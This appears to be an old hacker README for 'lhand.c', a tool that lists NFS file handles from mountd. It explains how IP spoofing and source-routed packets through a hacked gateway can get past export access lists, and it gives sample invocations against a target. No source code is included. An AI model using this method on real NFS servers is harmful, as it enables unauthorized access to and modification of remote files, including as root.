lhand.c

list all file handles via a TCP connection to mountd.

This was made in order to list every exported file system's file
handle that could be mounted.  Although this may at first view, seem
worthless, it is quite useful.

NFS Overview
------------

Whoever designed NFS was most probably an idiot.  The entire authentication
of NFS is based upon a file handle.  Once a person has a file handle via
mount, they can connect directly to nfsd without *ANY* further authentication.
One number controls the integrity and security of an entire network.  I
certainly would not put that level of responsibility on 1 silly number.

Tricking the system
-------------------

NFS mount has Access Control Lists which limit an outside attackers ability
to gain access to file systems.  While these Access Control Lists greatly
improve security, it is rather trivial to "spoof" the IP of your connection
to mount.  Mount checks your host against one in the "exports allowed" list
and matches them.  It returns a handle.  The handle can then be used to
change nearly any file on the remote file system.  Many administrators export
file systems -root to "trusted" hosts which is much worse, because mount will
return a file handle that gives permission to modify files as root.  This is
quite dangerous.

Source Routed Attacks
---------------------

Although this is just one of the many network services that can be 
manipulated with source routing, it is very useful.  Keep in mind that
*ANY* network service that bases authentication upon priviledged ports
or IP matching is vulnerable to source routed attacks.

-vsr-

VSR is a program that acts as a Virtual Source Routing interface to 
the ether.  It requires a hacked gateway to forward the source routed
packets and another machine to act as a host.  This program can be used
in a standalone fashion ->

host1% lhand some.host

And will return file handles for use with passing to nfs.

-slip-

Slip can be used with a hacked gateway much as vsr is used.  Slip is very
simple to reconfigure IP's for and the like.

slip% lhand @gateway@target

I've heard people suggest using ifconfig(1M) to change the IP however, I
think this would be quite disruptive and most probably break something.
If you come up with an idea forward it!

Bang.  NFS sucks.
